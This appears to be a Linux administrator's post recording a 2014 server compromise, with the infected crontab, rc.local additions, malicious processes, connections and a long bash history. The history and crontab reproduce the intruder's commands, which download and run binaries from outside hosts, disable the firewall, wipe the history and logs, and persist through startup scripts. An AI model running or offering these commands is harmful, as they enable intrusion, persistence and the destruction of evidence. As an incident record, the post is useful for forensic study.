linux被黑

阅读更多
/etc/rc.local 被添加
cd /etc;./ksapd
cd /etc;./kysapd
cd /etc;./atdd

网络连接
tcp        0      0  ?.?.?.?:50004          121.12.110.96:10991         ESTABLISHED 23984/./sksapd     
tcp        0      0  ?.?.?.?:7029           112.90.22.197:10991         ESTABLISHED 23977/./skysapd    
tcp        0      0  ?.?.?.?:49999          121.12.110.96:10991         ESTABLISHED 23952/./ksapd

进程
root     23952     1 23952 23952 99 21:16 ?        00:51:14   ./ksapd
root     23962     1 23962 23962  0 21:16 ?        00:00:02   ./kysapd
root     23970     1 23970 23970  0 21:16 ?        00:00:03   ./atdd
root     23977     1 23977 23977 99 21:16 ?        00:55:01   ./skysapd
root     23984     1 23984 23984 99 21:16 ?        00:52:43   ./sksapd

历史命令 history被清除

crontab 被修改
[root@web ~]# grep -v \#  /var/spool/cron/root
*/101 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sksapd
*/101 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/skysapd                
*/1 * * * * killall -9 new6
*/1 * * * * killall -9 new4
*/1 * * * * cd /etc; rm -rf dir sksapd.*
*/1 * * * * cd /etc; rm -rf dir skysapd.*
*/99 * * * * cd /root > .bash_history
*/1 * * * * chmod 7777 /etc/sksapd
*/1 * * * * chmod 7777 /etc/skysapd
*/99 * * * * killall -9 cupsdd
*/1 * * * * killall -9 node24
*/98 * * * * killall -9 ksapd
*/96 * * * * killall -9 kysapd
*/96 * * * * killall -9 atdd
*/1 * * * * chmod 7777 /etc/cupsdd
*/1 * * * * chmod 7777 /etc/ksapd
*/1 * * * * chmod 7777 /etc/kysapd
*/96 * * * * killall -9 sksapd
*/96 * * * * killall -9 skysapd
*/1 * * * * chmod 7777 /etc/atdd
*/1 * * * * /etc/init.d/iptables stop
*/1 * * * * nohup /etc/cupsdd > /dev/null 2>&1&
*/99 * * * * cd /etc;./ksapd
*/97 * * * * cd /etc;./kysapd
*/97 * * * * cd /etc;./atdd
*/69 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/cupsdd
*/97 * * * * cd /etc;./sksapd
*/97 * * * * cd /etc;./skysapd
*/79 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ksapd
*/89 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/kysapd
*/99 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd
*/1 * * * * cd /etc; rm -rf dir cupsdd.*
*/1 * * * * cd /etc; rm -rf dir kysapd.*
*/1 * * * * cd /etc; rm -rf dir ksapd.*
*/1 * * * * cd /etc; rm -rf dir atdd.*
*/1 * * * * killall -9 freeBSD
*/1 * * * * history -c
*/15 * * * * cd /var/log > secure







[root@web tmp]#
[root@web tmp]# cat /tmp/tttt
   12  2014-01-20 18:56:48 root killall sshbin
   13  2014-01-20 18:56:48 root killall xudp
   14  2014-01-20 18:56:48 root killall xupd1
   15  2014-01-20 18:56:48 root killall xudp2
   16  2014-01-20 18:56:48 root killall xudp3
   17  2014-01-20 18:56:48 root killall xudp4
   18  2014-01-20 18:56:48 root killall xudp5
   19  2014-01-20 18:56:48 root killall /etc/idmapd/idmapd.so.cp
   20  2014-01-20 18:56:48 root killall idmapd.so.cp
   21  2014-01-20 18:56:48 root killall .IptabLex
   22  2014-01-20 18:56:48 root killall .IptabLes
   23  2014-01-20 18:56:48 root killall linuxssh
   24  2014-01-20 18:56:48 root killall strutsbin
   25  2014-01-20 18:56:48 root killall 266189
   26  2014-01-20 18:56:48 root killall auto.bin
   27  2014-01-20 18:56:48 root rm -f -r /etc/idmapd/idmapd.so.cp
   28  2014-01-20 18:56:48 root rm -f -r /tmp/linuxx
   29  2014-01-20 18:56:48 root rm -f -r /tmp/ssh3
   30  2014-01-20 18:56:48 root rm -f -r /tmp/sh4
   31  2014-01-20 18:56:48 root rm -f -r /tmp/ssh6
   32  2014-01-20 18:56:48 root rm -f -r /tmp/ssh-32
   33  2014-01-20 18:56:48 root rm -f -r /tmp/ssh-64
   34  2014-01-20 18:56:48 root rm -f -r /tmp/ssh-c4
   35  2014-01-20 18:56:48 root rm -f -r /tmp/drmc
   36  2014-01-20 18:56:48 root rm -f -r /tmp/tmpof
   37  2014-01-20 18:56:48 root rm -f -r /tmp/1471
   38  2014-01-20 18:56:48 root rm -f -r /tmp/1417
   39  2014-01-20 18:56:48 root rm -f -r /tmp/v432
   40  2014-01-20 18:56:48 root rm -f -r /tmp/v532
   41  2014-01-20 18:56:48 root rm -f -r /tmp/29881
   42  2014-01-20 18:56:48 root rm -f -r /tmp/10993
   43  2014-01-20 18:56:48 root rm -f -r /tmp/behsdf
   44  2014-01-20 18:56:48 root rm -f -r /tmp/helen
   45  2014-01-20 18:56:48 root rm -f -r /tmp/lampp
   46  2014-01-20 18:56:48 root rm -f -r /tmp/Umi34Ber
   47  2014-01-20 18:56:48 root rm -f -r /tmp/mysql.sock
   48  2014-01-20 18:56:48 root rm -f -r /tmp/266189
   49  2014-01-20 18:56:48 root rm -f -r /etc/x1
   50  2014-01-20 18:56:48 root rm -f -r /etc/xxx
   51  2014-01-20 18:56:48 root rm -f -r /etc/dos32
   52  2014-01-20 18:56:48 root rm -f -r /etc/dos64
   53  2014-01-20 18:56:48 root rm -f -r /etc/007
   54  2014-01-20 18:56:48 root rm -f -r /etc/t32
   55  2014-01-20 18:56:48 root rm -f -r /etc/lq64
   56  2014-01-20 18:56:48 root rm -f -r /etc/t64
   57  2014-01-20 18:56:48 root rm -f -r /etc/lq32
   58  2014-01-20 18:56:48 root rm -f -r /etc/java.132.8_11
   59  2014-01-20 18:56:48 root rm -f -r /etc/idmapd/apd.so.cp
   60  2014-01-20 18:56:48 root rm -f -r /tmp/sshbin
   61  2014-01-20 18:56:48 root rm -f -r /tmp/xudp
   62  2014-01-20 18:56:48 root rm -f -r /tmp/xupd1
   63  2014-01-20 18:56:48 root rm -f -r /tmp/xudp2
   64  2014-01-20 18:56:48 root rm -f -r /tmp/xudp3
   65  2014-01-20 18:56:48 root rm -f -r /tmp/xudp4
   66  2014-01-20 18:56:48 root rm -f -r /tmp/xudp5
   67  2014-01-20 18:56:48 root rm -f -r /tmp/java.2.15.22_20
   68  2014-01-20 18:56:48 root rm -f -r /tmp/linuxssh
   69  2014-01-20 18:56:48 root rm -f -r /tmp/strutsbin
   70  2014-01-20 18:56:48 root rm -f -r /tmp/266189
   71  2014-01-20 18:56:48 root rm -f -r etc/java.13.2.8_11
   72  2014-01-20 18:56:48 root rm -f -r /etc/auto.bin
   73  2014-01-20 18:56:48 root find /etc/ -name "*.service2" -exec rm {} \;
   74  2014-01-20 18:56:48 root killall java-2013
   75  2014-01-20 18:56:48 root killall wins
   76  2014-01-20 18:56:48 root rm -f -r /etc/wins
   77  2014-01-20 18:56:48 root rm -f -r /etc/java-2013
   78  2014-01-20 18:56:48 root rm -f -r /etc/java-2013/java-2013
   79  2014-01-20 18:56:48 root mkdir /etc/wins
   80  2014-01-20 18:56:48 root wget -O /etc/wins/wins http://60.174.234.107:1974/wins
   81  2014-01-20 18:56:49 root chmod 0755 /etc/wins/wins
   82  2014-01-20 18:56:49 root nohup /etc/wins/wins > /dev/null 2>&1 &
   83  2014-01-20 18:56:49 root rm -f -r /etc/rc.local
   84  2014-01-20 18:56:49 root rm -r -f /etc/rc.d/rc.local
   85  2014-01-20 18:56:49 root echo "/etc/init.d/iptables stop">>/etc/rc.local
   86  2014-01-20 18:56:49 root echo "cd /etc/wins">>/etc/rc.local
   87  2014-01-20 18:56:49 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.local
   88  2014-01-20 18:56:49 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.local
   89  2014-01-20 18:56:49 root echo "/etc/init.d/iptables stop">>/etc/rc.d/rc.local
   90  2014-01-20 18:56:49 root echo "cd /etc/wins">>/etc/rc.d/rc.local
   91  2014-01-20 18:56:49 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.d/rc.local
   92  2014-01-20 18:56:49 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.d/rc.local
   93  2014-01-20 18:56:49 root rm -f -r 2618
   94  2014-01-20 18:56:49 root rm -r -f TS269
   95  2014-01-20 18:56:49 root exit
   96  2014-01-20 18:44:53 root ps -ef  |more
   97  2014-01-20 18:45:44 root history |more
   98  2014-01-20 18:53:10 root passwd
   99  2014-01-20 18:58:15 root exit
  100  2014-01-20 19:14:16 root passwd
  101  2014-01-20 19:15:40 root exit
  102  2014-01-20 19:18:07 root top
  103  2014-01-20 19:19:03 root ps -ef |more
  104  2014-01-20 19:19:47 root lsof -p 23656
  105  2014-01-20 19:19:59 root lsof -p 23656
  106  2014-01-20 19:20:03 root ps -ef |more
  107  2014-01-20 19:21:25 root cd /etc/wins/wins
  108  2014-01-20 19:21:31 root cd /etc/wins
  109  2014-01-20 19:21:47 root cd /etc/wins
  110  2014-01-20 19:21:58 root lll -a /
  111  2014-01-20 19:22:03 root ll -a /
  112  2014-01-20 19:22:14 root ll -a /boot/
  113  2014-01-20 19:23:00 root cd /etc/liunx
  114  2014-01-20 19:23:13 root cd /etc/idmapd
  115  2014-01-20 19:23:15 root ls\
  116  2014-01-20 19:23:19 root ls
  117  2014-01-20 19:23:29 root ll -a
  118  2014-01-20 19:23:43 root rm .idmapd_open
  119  2014-01-20 19:23:53 root ll -a
  120  2014-01-20 19:26:12 root cd /etc/rc.local
  121  2014-01-20 19:26:21 root cd /etc/rc.local
  122  2014-01-20 19:26:43 root cd /etc/rc.d/rc.local
  123  2014-01-20 19:26:53 root ps -ef |more
  124  2014-01-20 19:28:49 root cd /etc/wins
  125  2014-01-20 19:29:02 root ll -a /wins
  126  2014-01-20 19:29:11 root ll -a /etc/wins
  127  2014-01-20 19:29:20 root pwd
  128  2014-01-20 19:29:27 root ll -a /etc/
  129  2014-01-20 19:29:34 root ll -a /etc/ |more
  130  2014-01-20 19:35:12 root ll -a /etc/
  131  2014-01-20 19:35:20 root ll -a /etc/ |more
  132  2014-01-20 19:35:36 root ps -ef|more
  133  2014-01-20 19:36:17 root history
  134  2014-01-20 19:36:23 root history |more
  135  2014-01-20 19:40:44 root cd /etc/java-2013
  136  2014-01-20 19:40:53 root ll -a /tmp
  137  2014-01-20 19:41:17 root ll -a /tmp
  138  2014-01-20 19:41:21 root ll -a /tmp
  139  2014-01-20 19:45:35 root cat /root/killback.sh
  140  2014-01-20 19:45:50 root ll -a /tmp
  141  2014-01-20 19:46:04 root rm java.pl
  142  2014-01-20 19:46:14 root rm -r java.pl
  143  2014-01-20 19:46:23 root ll -a /tmp
  144  2014-01-20 19:46:35 root rm -r -f java.pl
  145  2014-01-20 19:46:37 root ll -a /tmp
  146  2014-01-20 19:46:41 root ll -a /tmp
  147  2014-01-20 19:46:44 root ll -a /tmp
  148  2014-01-20 19:46:56 root rm -r -f java.pl
  149  2014-01-20 19:46:58 root ll -a /tmp
  150  2014-01-20 19:48:00 root exit
  151  2014-01-20 19:18:36 root top
  152  2014-01-20 19:18:43 root ps -efjH
  153  2014-01-20 19:18:59 root cd /etc/
  154  2014-01-20 19:19:03 root rm -rf wins/
  155  2014-01-20 19:19:13 root kill 23656 23656
  156  2014-01-20 19:19:18 root ps -efjH
  157  2014-01-20 19:19:47 root netstat -nltp
  158  2014-01-20 19:21:13 root netstat -natp|grep EST|grep ssh
  159  2014-01-20 19:21:22 root history|grep netsta
  160  2014-01-20 19:21:28 root netstat -natp|grep EST|grep -vE 'mysql|java|nginx|mem'
  161  2014-01-20 19:21:30 root netstat -natp|grep EST|grep -vE 'mysql|java|nginx|mem'
  162  2014-01-20 19:28:33 root cd /opt/apache-tomcat-6.0.26/webapps/
  163  2014-01-20 19:28:34 root ls
  164  2014-01-20 19:28:35 root cd ROOT/
  165  2014-01-20 19:28:37 root git status
  166  2014-01-20 19:57:05 root ll /etc/wi
  167  2014-01-20 19:57:07 root ll /etc/wi
  168  2014-01-20 20:08:03 root ps -efjH
  169  2014-01-20 20:08:14 root ps -efjH
  170  2014-01-20 20:08:16 root ps -efjH
  171  2014-01-20 20:08:17 root ps -efjH
  172  2014-01-20 21:25:27 root top
  173  2014-01-20 21:26:39 root top -d 30
  174  2014-01-20 21:27:39 root /etc/init.d/iptables stop
  175  2014-01-20 21:27:39 root echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  176  2014-01-20 21:27:39 root chmod 0775 /usr/bin/nohup
  177  2014-01-20 21:27:39 root chmod 0775 /usr/bin/killall
  178  2014-01-20 21:27:39 root killall lixtest
  179  2014-01-20 21:27:39 root killall linuxx
  180  2014-01-20 21:27:39 root killall ssh3
  181  2014-01-20 21:27:39 root killall ssh4
  182  2014-01-20 21:27:39 root killall ssh6
  183  2014-01-20 21:27:39 root killall ssh-32
  184  2014-01-20 21:27:39 root killall ssh-64
  185  2014-01-20 21:27:39 root killall ssh-c4
  186  2014-01-20 21:27:39 root killall java.13.2.8_11
  187  2014-01-20 21:27:39 root killall drmc
  188  2014-01-20 21:27:39 root killall tmpof
  189  2014-01-20 21:27:39 root killall 1471
  190  2014-01-20 21:27:39 root killall 1417
  191  2014-01-20 21:27:39 root killall v432
  192  2014-01-20 21:27:39 root killall v532
  193  2014-01-20 21:27:39 root killall 29881
  194  2014-01-20 21:27:39 root killall 10993
  195  2014-01-20 21:27:39 root killall behsdf
  196  2014-01-20 21:27:39 root killall helen
  197  2014-01-20 21:27:39 root killall lampp
  198  2014-01-20 21:27:39 root killall Umi34Ber
  199  2014-01-20 21:27:39 root killall mysql.sock
  200  2014-01-20 21:27:39 root killall sshd
  201  2014-01-20 21:27:39 root killall xxx
  202  2014-01-20 21:27:39 root killall dos32
  203  2014-01-20 21:27:39 root killall dos64
  204  2014-01-20 21:27:39 root killall 007
  205  2014-01-20 21:27:39 root killall t32
  206  2014-01-20 21:27:39 root killall lq64
  207  2014-01-20 21:27:39 root killall t64
  208  2014-01-20 21:27:39 root killall lq32
  209  2014-01-20 21:27:40 root killall java.132.8_11
  210  2014-01-20 21:27:40 root killall 261180
  211  2014-01-20 21:27:40 root killall sshbin
  212  2014-01-20 21:27:40 root killall xudp
  213  2014-01-20 21:27:40 root killall xupd1
  214  2014-01-20 21:27:40 root killall xudp2
  215  2014-01-20 21:27:40 root killall xudp3
  216  2014-01-20 21:27:40 root killall xudp4
  217  2014-01-20 21:27:40 root killall xudp5
  218  2014-01-20 21:27:40 root killall /etc/idmapd/idmapd.so.cp
  219  2014-01-20 21:27:40 root killall idmapd.so.cp
  220  2014-01-20 21:27:40 root killall .IptabLex
  221  2014-01-20 21:27:40 root killall .IptabLes
  222  2014-01-20 21:27:40 root killall linuxssh
  223  2014-01-20 21:27:40 root killall strutsbin
  224  2014-01-20 21:27:40 root killall 266189
  225  2014-01-20 21:27:40 root killall auto.bin
  226  2014-01-20 21:27:40 root rm -f -r /etc/idmapd/idmapd.so.cp
  227  2014-01-20 21:27:40 root rm -f -r /tmp/linuxx
  228  2014-01-20 21:27:40 root rm -f -r /tmp/ssh3
  229  2014-01-20 21:27:40 root rm -f -r /tmp/sh4
  230  2014-01-20 21:27:40 root rm -f -r /tmp/ssh6
  231  2014-01-20 21:27:40 root rm -f -r /tmp/ssh-32
  232  2014-01-20 21:27:40 root rm -f -r /tmp/ssh-64
  233  2014-01-20 21:27:40 root rm -f -r /tmp/ssh-c4
  234  2014-01-20 21:27:40 root rm -f -r /tmp/drmc
  235  2014-01-20 21:27:40 root rm -f -r /tmp/tmpof
  236  2014-01-20 21:27:40 root rm -f -r /tmp/1471
  237  2014-01-20 21:27:40 root rm -f -r /tmp/1417
  238  2014-01-20 21:27:40 root rm -f -r /tmp/v432
  239  2014-01-20 21:27:40 root rm -f -r /tmp/v532
  240  2014-01-20 21:27:40 root rm -f -r /tmp/29881
  241  2014-01-20 21:27:40 root rm -f -r /tmp/10993
  242  2014-01-20 21:27:40 root rm -f -r /tmp/behsdf
  243  2014-01-20 21:27:40 root rm -f -r /tmp/helen
  244  2014-01-20 21:27:40 root rm -f -r /tmp/lampp
  245  2014-01-20 21:27:40 root rm -f -r /tmp/Umi34Ber
  246  2014-01-20 21:27:40 root rm -f -r /tmp/mysql.sock
  247  2014-01-20 21:27:40 root rm -f -r /tmp/266189
  248  2014-01-20 21:27:40 root rm -f -r /etc/x1
  249  2014-01-20 21:27:40 root rm -f -r /etc/xxx
  250  2014-01-20 21:27:40 root rm -f -r /etc/dos32
  251  2014-01-20 21:27:40 root rm -f -r /etc/dos64
  252  2014-01-20 21:27:40 root rm -f -r /etc/007
  253  2014-01-20 21:27:40 root rm -f -r /etc/t32
  254  2014-01-20 21:27:40 root rm -f -r /etc/lq64
  255  2014-01-20 21:27:40 root rm -f -r /etc/t64
  256  2014-01-20 21:27:40 root rm -f -r /etc/lq32
  257  2014-01-20 21:27:40 root rm -f -r /etc/java.132.8_11
  258  2014-01-20 21:27:40 root rm -f -r /etc/idmapd/apd.so.cp
  259  2014-01-20 21:27:40 root rm -f -r /tmp/sshbin
  260  2014-01-20 21:27:40 root rm -f -r /tmp/xudp
  261  2014-01-20 21:27:40 root rm -f -r /tmp/xupd1
  262  2014-01-20 21:27:40 root rm -f -r /tmp/xudp2
  263  2014-01-20 21:27:40 root rm -f -r /tmp/xudp3
  264  2014-01-20 21:27:40 root rm -f -r /tmp/xudp4
  265  2014-01-20 21:27:40 root rm -f -r /tmp/xudp5
  266  2014-01-20 21:27:40 root rm -f -r /tmp/java.2.15.22_20
  267  2014-01-20 21:27:40 root rm -f -r /tmp/linuxssh
  268  2014-01-20 21:27:40 root rm -f -r /tmp/strutsbin
  269  2014-01-20 21:27:40 root rm -f -r /tmp/266189
  270  2014-01-20 21:27:40 root rm -f -r etc/java.13.2.8_11
  271  2014-01-20 21:27:40 root rm -f -r /etc/auto.bin
  272  2014-01-20 21:27:40 root find /etc/ -name "*.service2" -exec rm {} \;
  273  2014-01-20 21:27:40 root killall java-2013
  274  2014-01-20 21:27:40 root killall wins
  275  2014-01-20 21:27:40 root rm -f -r /etc/wins
  276  2014-01-20 21:27:40 root rm -f -r /etc/java-2013
  277  2014-01-20 21:27:40 root rm -f -r /etc/java-2013/java-2013
  278  2014-01-20 21:27:40 root mkdir /etc/wins
  279  2014-01-20 21:27:40 root wget -O /etc/wins/wins http://60.174.234.107:1974/wins
  280  2014-01-20 21:27:41 root chmod 0755 /etc/wins/wins
  281  2014-01-20 21:27:41 root nohup /etc/wins/wins > /dev/null 2>&1 &
  282  2014-01-20 21:27:41 root rm -f -r /etc/rc.local
  283  2014-01-20 21:27:41 root rm -r -f /etc/rc.d/rc.local
  284  2014-01-20 21:27:41 root echo "/etc/init.d/iptables stop">>/etc/rc.local
  285  2014-01-20 21:27:41 root echo "cd /etc/wins">>/etc/rc.local
  286  2014-01-20 21:27:41 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.local
  287  2014-01-20 21:27:41 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.local
  288  2014-01-20 21:27:41 root echo "/etc/init.d/iptables stop">>/etc/rc.d/rc.local
  289  2014-01-20 21:27:41 root echo "cd /etc/wins">>/etc/rc.d/rc.local
  290  2014-01-20 21:27:41 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.d/rc.local
  291  2014-01-20 21:27:41 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.d/rc.local
  292  2014-01-20 21:27:41 root rm -f -r 2618
  293  2014-01-20 21:27:41 root rm -r -f TS269
  294  2014-01-20 21:27:41 root exit
  295  2014-01-20 21:29:46 root /etc/init.d/iptables stop
  296  2014-01-20 21:29:46 root echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  297  2014-01-20 21:29:46 root chmod 0775 /usr/bin/nohup
  298  2014-01-20 21:29:46 root chmod 0775 /usr/bin/killall
  299  2014-01-20 21:29:46 root killall lixtest
  300  2014-01-20 21:29:46 root killall linuxx
  301  2014-01-20 21:29:46 root killall ssh3
  302  2014-01-20 21:29:46 root killall ssh4
  303  2014-01-20 21:29:46 root killall ssh6
  304  2014-01-20 21:29:46 root killall ssh-32
  305  2014-01-20 21:29:46 root killall ssh-64
  306  2014-01-20 21:29:46 root killall ssh-c4
  307  2014-01-20 21:29:46 root killall java.13.2.8_11
  308  2014-01-20 21:29:46 root killall drmc
  309  2014-01-20 21:29:46 root killall tmpof
  310  2014-01-20 21:29:46 root killall 1471
  311  2014-01-20 21:29:46 root killall 1417
  312  2014-01-20 21:29:46 root killall v432
  313  2014-01-20 21:29:46 root killall v532
  314  2014-01-20 21:29:46 root killall 29881
  315  2014-01-20 21:29:46 root killall 10993
  316  2014-01-20 21:29:46 root killall behsdf
  317  2014-01-20 21:29:46 root killall helen
  318  2014-01-20 21:29:46 root killall lampp
  319  2014-01-20 21:29:46 root killall Umi34Ber
  320  2014-01-20 21:29:46 root killall mysql.sock
  321  2014-01-20 21:29:46 root killall sshd
  322  2014-01-20 21:29:46 root killall xxx
  323  2014-01-20 21:29:46 root killall dos32
  324  2014-01-20 21:29:46 root killall dos64
  325  2014-01-20 21:29:46 root killall 007
  326  2014-01-20 21:29:46 root killall t32
  327  2014-01-20 21:29:46 root killall lq64
  328  2014-01-20 21:29:46 root killall t64
  329  2014-01-20 21:29:46 root killall lq32
  330  2014-01-20 21:29:46 root killall java.132.8_11
  331  2014-01-20 21:29:46 root killall 261180
  332  2014-01-20 21:29:46 root killall sshbin
  333  2014-01-20 21:29:46 root killall xudp
  334  2014-01-20 21:29:46 root killall xupd1
  335  2014-01-20 21:29:46 root killall xudp2
  336  2014-01-20 21:29:46 root killall xudp3
  337  2014-01-20 21:29:46 root killall xudp4
  338  2014-01-20 21:29:46 root killall xudp5
  339  2014-01-20 21:29:46 root killall /etc/idmapd/idmapd.so.cp
  340  2014-01-20 21:29:46 root killall idmapd.so.cp
  341  2014-01-20 21:29:46 root killall .IptabLex
  342  2014-01-20 21:29:46 root killall .IptabLes
  343  2014-01-20 21:29:46 root killall linuxssh
  344  2014-01-20 21:29:46 root killall strutsbin
  345  2014-01-20 21:29:46 root killall 266189
  346  2014-01-20 21:29:46 root killall auto.bin
  347  2014-01-20 21:29:46 root rm -f -r /etc/idmapd/idmapd.so.cp
  348  2014-01-20 21:29:46 root rm -f -r /tmp/linuxx
  349  2014-01-20 21:29:46 root rm -f -r /tmp/ssh3
  350  2014-01-20 21:29:46 root rm -f -r /tmp/sh4
  351  2014-01-20 21:29:46 root rm -f -r /tmp/ssh6
  352  2014-01-20 21:29:46 root rm -f -r /tmp/ssh-32
  353  2014-01-20 21:29:46 root rm -f -r /tmp/ssh-64
  354  2014-01-20 21:29:46 root rm -f -r /tmp/ssh-c4
  355  2014-01-20 21:29:46 root rm -f -r /tmp/drmc
  356  2014-01-20 21:29:46 root rm -f -r /tmp/tmpof
  357  2014-01-20 21:29:46 root rm -f -r /tmp/1471
  358  2014-01-20 21:29:46 root rm -f -r /tmp/1417
  359  2014-01-20 21:29:46 root rm -f -r /tmp/v432
  360  2014-01-20 21:29:46 root rm -f -r /tmp/v532
  361  2014-01-20 21:29:46 root rm -f -r /tmp/29881
  362  2014-01-20 21:29:46 root rm -f -r /tmp/10993
  363  2014-01-20 21:29:46 root rm -f -r /tmp/behsdf
  364  2014-01-20 21:29:46 root rm -f -r /tmp/helen
  365  2014-01-20 21:29:46 root rm -f -r /tmp/lampp
  366  2014-01-20 21:29:46 root rm -f -r /tmp/Umi34Ber
  367  2014-01-20 21:29:46 root rm -f -r /tmp/mysql.sock
  368  2014-01-20 21:29:46 root rm -f -r /tmp/266189
  369  2014-01-20 21:29:46 root rm -f -r /etc/x1
  370  2014-01-20 21:29:46 root rm -f -r /etc/xxx
  371  2014-01-20 21:29:46 root rm -f -r /etc/dos32
  372  2014-01-20 21:29:46 root rm -f -r /etc/dos64
  373  2014-01-20 21:29:46 root rm -f -r /etc/007
  374  2014-01-20 21:29:46 root rm -f -r /etc/t32
  375  2014-01-20 21:29:46 root rm -f -r /etc/lq64
  376  2014-01-20 21:29:46 root rm -f -r /etc/t64
  377  2014-01-20 21:29:46 root rm -f -r /etc/lq32
  378  2014-01-20 21:29:46 root rm -f -r /etc/java.132.8_11
  379  2014-01-20 21:29:46 root rm -f -r /etc/idmapd/apd.so.cp
  380  2014-01-20 21:29:46 root rm -f -r /tmp/sshbin
  381  2014-01-20 21:29:46 root rm -f -r /tmp/xudp
  382  2014-01-20 21:29:46 root rm -f -r /tmp/xupd1
  383  2014-01-20 21:29:46 root rm -f -r /tmp/xudp2
  384  2014-01-20 21:29:46 root rm -f -r /tmp/xudp3
  385  2014-01-20 21:29:46 root rm -f -r /tmp/xudp4
  386  2014-01-20 21:29:46 root rm -f -r /tmp/xudp5
  387  2014-01-20 21:29:46 root rm -f -r /tmp/java.2.15.22_20
  388  2014-01-20 21:29:46 root rm -f -r /tmp/linuxssh
  389  2014-01-20 21:29:46 root rm -f -r /tmp/strutsbin
  390  2014-01-20 21:29:46 root rm -f -r /tmp/266189
  391  2014-01-20 21:29:46 root rm -f -r etc/java.13.2.8_11
  392  2014-01-20 21:29:46 root rm -f -r /etc/auto.bin
  393  2014-01-20 21:29:46 root find /etc/ -name "*.service2" -exec rm {} \;
  394  2014-01-20 21:29:46 root killall java-2013
  395  2014-01-20 21:29:46 root killall wins
  396  2014-01-20 21:29:47 root rm -f -r /etc/wins
  397  2014-01-20 21:29:47 root rm -f -r /etc/java-2013
  398  2014-01-20 21:29:47 root rm -f -r /etc/java-2013/java-2013
  399  2014-01-20 21:29:47 root mkdir /etc/wins
  400  2014-01-20 21:29:47 root wget -O /etc/wins/wins http://60.174.234.107:1974/wins
  401  2014-01-20 21:29:48 root chmod 0755 /etc/wins/wins
  402  2014-01-20 21:29:48 root nohup /etc/wins/wins > /dev/null 2>&1 &
  403  2014-01-20 21:29:48 root rm -f -r /etc/rc.local
  404  2014-01-20 21:29:48 root rm -r -f /etc/rc.d/rc.local
  405  2014-01-20 21:29:48 root echo "/etc/init.d/iptables stop">>/etc/rc.local
  406  2014-01-20 21:29:48 root echo "cd /etc/wins">>/etc/rc.local
  407  2014-01-20 21:29:48 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.local
  408  2014-01-20 21:29:48 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.local
  409  2014-01-20 21:29:48 root echo "/etc/init.d/iptables stop">>/etc/rc.d/rc.local
  410  2014-01-20 21:29:48 root echo "cd /etc/wins">>/etc/rc.d/rc.local
  411  2014-01-20 21:29:48 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.d/rc.local
  412  2014-01-20 21:29:48 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.d/rc.local
  413  2014-01-20 21:29:48 root rm -f -r 2618
  414  2014-01-20 21:29:48 root rm -r -f TS269
  415  2014-01-20 21:29:48 root exit
  416  2014-01-20 21:37:20 root ls
  417  2014-01-20 21:37:30 root ps -ef |more
  418  2014-01-20 21:38:17 root ps -ef |more
  419  2014-01-20 21:38:59 root ps -ef |more
  420  2014-01-20 21:39:54 root top
  421  2014-01-20 21:40:23 root cd /etc/wins
  422  2014-01-20 21:40:24 root ls
  423  2014-01-20 21:40:31 root ll -a ./
  424  2014-01-20 21:40:47 root rm -r -f /etc/wins
  425  2014-01-20 21:40:59 root ll -a /
  426  2014-01-20 21:41:10 root ll -a /boot/
  427  2014-01-20 21:41:50 root crontab -l
  428  2014-01-20 21:45:00 root crontab -l
  429  2014-01-20 21:45:05 root /etc/init.d/iptables stop
  430  2014-01-20 21:45:05 root echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  431  2014-01-20 21:45:05 root chmod 0775 /usr/bin/nohup
  432  2014-01-20 21:45:05 root chmod 0775 /usr/bin/killall
  433  2014-01-20 21:45:05 root killall lixtest
  434  2014-01-20 21:45:05 root killall linuxx
  435  2014-01-20 21:45:05 root killall ssh3
  436  2014-01-20 21:45:05 root killall ssh4
  437  2014-01-20 21:45:05 root killall ssh6
  438  2014-01-20 21:45:05 root killall ssh-32
  439  2014-01-20 21:45:05 root killall ssh-64
  440  2014-01-20 21:45:05 root killall ssh-c4
  441  2014-01-20 21:45:05 root killall java.13.2.8_11
  442  2014-01-20 21:45:05 root killall drmc
  443  2014-01-20 21:45:05 root killall tmpof
  444  2014-01-20 21:45:05 root killall 1471
  445  2014-01-20 21:45:05 root killall 1417
  446  2014-01-20 21:45:05 root killall v432
  447  2014-01-20 21:45:05 root killall v532
  448  2014-01-20 21:45:05 root killall 29881
  449  2014-01-20 21:45:06 root killall 10993
  450  2014-01-20 21:45:06 root killall behsdf
  451  2014-01-20 21:45:06 root killall helen
  452  2014-01-20 21:45:06 root killall lampp
  453  2014-01-20 21:45:06 root killall Umi34Ber
  454  2014-01-20 21:45:06 root killall mysql.sock
  455  2014-01-20 21:45:06 root killall sshd
  456  2014-01-20 21:45:06 root killall xxx
  457  2014-01-20 21:45:06 root killall dos32
  458  2014-01-20 21:45:06 root killall dos64
  459  2014-01-20 21:45:06 root killall 007
  460  2014-01-20 21:45:06 root killall t32
  461  2014-01-20 21:45:06 root killall lq64
  462  2014-01-20 21:45:06 root killall t64
  463  2014-01-20 21:45:06 root killall lq32
  464  2014-01-20 21:45:06 root killall java.132.8_11
  465  2014-01-20 21:45:06 root killall 261180
  466  2014-01-20 21:45:06 root killall sshbin
  467  2014-01-20 21:45:06 root killall xudp
  468  2014-01-20 21:45:06 root killall xupd1
  469  2014-01-20 21:45:06 root killall xudp2
  470  2014-01-20 21:45:06 root killall xudp3
  471  2014-01-20 21:45:06 root killall xudp4
  472  2014-01-20 21:45:06 root killall xudp5
  473  2014-01-20 21:45:06 root killall /etc/idmapd/idmapd.so.cp
